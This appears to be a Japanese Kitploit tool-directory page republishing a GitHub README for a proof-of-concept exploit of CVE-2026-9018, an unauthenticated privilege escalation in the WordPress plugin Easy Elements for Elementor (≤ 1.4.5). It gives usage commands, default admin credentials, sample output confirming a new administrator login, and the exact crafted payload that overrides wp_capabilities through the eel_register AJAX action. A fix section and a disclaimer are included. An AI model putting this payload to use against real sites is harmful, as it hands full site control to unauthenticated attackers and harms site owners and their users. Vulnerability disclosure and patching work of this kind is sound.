Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-9018 — 未認証の権限昇格 CVE-2026-9018: Easy Elements for Elementor | Kitploit
ツール/GitHubGitHub/xxconi/cve-2026-9018
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubxxconi/cve-2026-9018

CVE-2026-9018

未認証の権限昇格 CVE-2026-9018: Easy Elements for Elementor

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-9018

CVE-2026-9018 — Easy Elements for Elementor ≤ 1.4.5 | 未認証の権限昇格

CVE CVSS CWE Auth Python

研究者: Atomic Edge 深刻度: 高 | CVSS: 8.8 | 認証要件: なし


概要

WordPress プラグイン Easy Elements for Elementor – Addons & Website Templates(バージョン ≤ 1.4.5)には、未認証の権限昇格の脆弱性が存在します。wp_ajax_nopriv_eel_register AJAX ハンドラーを介して公開されている easyel_handle_register() 関数は、攻撃者が制御する custom_meta POST 値をキーのホワイトリストなしで update_user_meta() に直接渡します。これにより、未認証の攻撃者が wp_capabilities メタキーを上書きし、管理者レベルのアカウントを作成できます。


前提条件

悪用する前に、対象サイトで以下の条件が満たされている必要があります:

  • ✅ WordPress でユーザー登録が有効である(設定 → 一般 → 誰でも登録できます)
  • ✅ プラグインのログイン/登録ウィジェットを含むページが公開されている
  • ✅ ウィジェットがページ DOM 内に easy_elements_nonce 値を公開している

要件

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
# Basic — nonce fetched from homepage
python3 poc.py -u https://target.com

# Custom credentials
python3 poc.py -u https://target.com -U hacker -e [email protected] -p P@ssw0rd!

# Widget is on /login/ page
python3 poc.py -u https://target.com --nonce-page /login/

# Skip SSL verification
python3 poc.py -u https://target.com --no-verify

# Skip post-exploit login check
python3 poc.py -u https://target.com --skip-verify-login

引数

出力例

root@kitploit:~
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : [email protected]
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[✓] Privilege escalation payload accepted!
[✓] Admin login CONFIRMED!

    ┌─────────────────────────────────────────┐
    │  WP Admin  : https://target.com/wp-admin/
    │  Username  : atomic_admin
    │  Password  : Atomic@Edge2026!
    └─────────────────────────────────────────┘

技術的詳細

このエクスプロイトは 2 段階のプロセスで実行されます:

ステップ 1 — ノンスの収集 プラグインのログイン/登録 Elementor ウィジェットは、ページ HTML 内に隠しフィールド easy_elements_nonce を描画します。このノンスは未認証の訪問者なら誰でもアクセスでき、ページソースから正規表現で抽出されます。

ステップ 2 — 悪意のある登録 action=eel_register を指定した POST リクエストが /wp-admin/admin-ajax.php に送信されます。custom_meta 配列は次のように細工されます:

root@kitploit:~
custom_meta[wp_capabilities][administrator] = 1

easyel_handle_register() はすべての custom_meta キーをホワイトリストなしで update_user_meta() に直接渡すため、登録後に wp_capabilities ユーザーメタが上書きされ、新しいユーザーに完全な管理者権限が付与されます。


修正方法

開発者は easyel_handle_register() に以下の修正を適用する必要があります:

  1. 許可される custom_meta キーの厳格なホワイトリストを実装する(例: first_name、last_name、phone)
  2. 機密キーを明示的にブロックする: wp_capabilities、wp_user_level、session_tokens
  3. 不要であれば wp_insert_user() 後のユーザー指定メタの処理を完全に避ける
  4. 入力サニタイズだけでは不十分 — ホワイトリストが必須

→ 直ちに Easy Elements for Elementor 1.4.6 以降へ更新してください。


免責事項

このリポジトリは許可されたセキュリティ研究および教育目的のみを意図しています。 システム所有者からの明示的な書面による許可なしに、このツールをいかなるシステムに対しても使用しないでください。 無断使用は、CFAA(米国)、刑法第 342.1 条(カナダ)、EU NIS2 指令、およびその他の該当する法律に違反する可能性があります。 著者は、このコードに起因する誤用または損害について一切の責任を負いません。

ツールをダウンロード
プロパティ詳細
プラグインEasy Elements for Elementor – Addons & Website Templates (easy-elements)
影響を受けるバージョン≤ 1.4.5
修正バージョン1.4.6+
攻撃ベクトルネットワーク / 未認証
CWECWE-269: 不適切な権限管理
AJAX アクションeel_register (nopriv)
Flag説明デフォルト
-u, --url対象 WordPress URL(必須)
-U, --username新規管理者アカウントのユーザー名atomic_admin
-e, --email新規管理者アカウントのメールアドレス[email protected]
-p, --password新規管理者アカウントのパスワードAtomic@Edge2026!
-np, --nonce-pageログイン/登録ウィジェットを含むページのパス/
--no-verifySSL 証明書の検証を無効化false
--skip-verify-login攻撃後の WP 管理者ログイン検証をスキップfalse